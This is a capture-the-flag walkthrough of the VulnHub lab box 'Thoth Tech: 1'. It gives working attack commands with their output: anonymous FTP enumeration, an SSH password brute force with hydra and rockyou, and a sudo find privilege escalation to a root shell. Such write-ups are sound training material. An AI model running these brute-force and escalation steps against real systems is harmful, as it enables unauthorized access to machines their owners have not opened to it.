This is THOTH TECH: 1 from VulnHub.

There is no information about this box. I’ve been banging on a few and not getting them completed lately so not many writeups. This one was easy and will be brief. I did complete the latest HTB machine Previse the other day but no write-up on that.




We have anonymous login, one file only and no upload:

└─# ftp                                                                                        
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lash
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 65534    65534        4096 Jul 02 09:33 .
drwxr-xr-x    2 65534    65534        4096 Jul 02 09:33 ..
-rw-r--r--    1 0        0             110 Jul 02 09:33 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (110 bytes).
226 Transfer complete.
110 bytes received in 0.00 secs (52.2226 kB/s)
ftp> quit
221 Goodbye.

The file says:

Dear pwnlab,
My name is jake. Your password is very weak and easily crackable, I think change your password.


python3 /opt/dirsearch/ -u

Dirsearch turns up only a few things, one of which is wordpress and another is test.php which only displays ‘hi guys’. Could we break the wordpress password? Perhaps an LFI?

wpscan says:

Scan Aborted: The URL supplied redirects to Use the –ignore-main-redirect option to ignore the redirection and scan the target, or change the –url option value to the redirected URL.

Okay then, let’s use –ignore-main-redirect

wpscan -e --url --api-token GET_YOUR_OWN_ITS_FREE --ignore-main-redirect

Scan Aborted: The remote website is up, but does not seem to be running WordPress.

Whatever. It’s constantly trying to redirect to I can have a look at the page and sure enough there is blog post by pwnlab. What else can we try?

└─# hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2021-08-14 07:02:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://
[STATUS] 160.00 tries/min, 160 tries in 00:01h, 14344240 to do in 1494:12h, 16 active
[22][ssh] host:   login: pwnlab   password: babygirl1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra ( finished at 2021-08-14 07:04:22

Ok then.

GTFOBins root

Yes, that easy.

└─# ssh pwnlab@                                                                                                      255 ⨯
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:Pw4/N+COKqnBrc/qv/3XYzmwPBCJYBwbDtx9hHOxdA8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
pwnlab@'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:
 * Management:
 * Support:

 System information disabled due to load higher than 1.0

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

66 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Jul  2 09:14:12 2021 from
pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwnlab may run the following commands on thothtech:
    (root) NOPASSWD: /usr/bin/find
pwnlab@thothtech:~$ sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
Sat 14 Aug 2021 11:10:22 AM UTC
# cd /root
# ls
root.txt  snap
# cat root.txt
Root flag: d51546d5bcf8e3856c7bff5d201f0df6

good job :)